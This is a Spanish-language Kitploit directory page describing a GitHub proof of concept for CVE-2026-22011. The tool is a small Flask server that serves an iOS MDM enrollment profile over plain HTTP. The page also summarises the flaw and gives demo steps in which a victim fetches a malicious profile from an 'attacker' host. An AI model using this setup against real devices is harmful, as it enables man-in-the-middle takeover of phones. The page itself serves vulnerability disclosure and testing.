Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP — Servidor Flask PoC para CVE-2026-22011 que sirve un perfil de inscripción MDM malicioso para iOS a través de HTTP, lo que permite la interceptación man-in-the-middle y el compromiso del dispositivo. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http
Seguridad iOSAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónSeguridad Móvil
GitHubgeorge0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http

CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP

Servidor Flask PoC para CVE-2026-22011 que sirve un perfil de inscripción MDM malicioso para iOS a través de HTTP, lo que permite la interceptación man-in-the-middle y el compromiso del dispositivo.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 16 díasAún no revisado

CVE-2026-22011 – Entrega de perfiles MDM de iOS a través de HTTP

Código del programa (servidor MDM Python Flask)

root@kitploit:~
# mdm_server.py - Serves enrollment profile over plain HTTP
from flask import Flask, send_file

app = Flask(__name__)
@app.route('/enroll.mobileconfig')
def serve_profile():
    # Vulnerability: profile delivered without HTTPS
    return send_file('profile.mobileconfig', mimetype='application/x-apple-aspen-config')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

CVE-2026-22011 – Entrega de perfiles MDM de iOS a través de HTTP

Severity: High

Resumen

Un perfil de inscripción MDM se sirve a través de HTTP plano, sin cifrado ni verificación de firma digital. Un atacante en la misma red puede interceptar la solicitud y sustituir el perfil por uno malicioso, obteniendo privilegios de administración del dispositivo.

Detalles de la vulnerabilidad

  • Tipo: Hombre en el medio / Transporte inseguro
  • Impacto: Compromiso total del dispositivo mediante un MDM malicioso.
  • Causa raíz: La URL del perfil es HTTP e iOS no obliga a usar HTTPS para la inscripción MDM (depende de la configuración), lo que permite la interceptación.

Demostración del exploit

Inicie el servidor HTTP del atacante:

root@kitploit:~
python mdm_server.py

Cuando la víctima visita http://attacker/enroll.mobileconfig, se descarga el perfil malicioso.

Descargar herramienta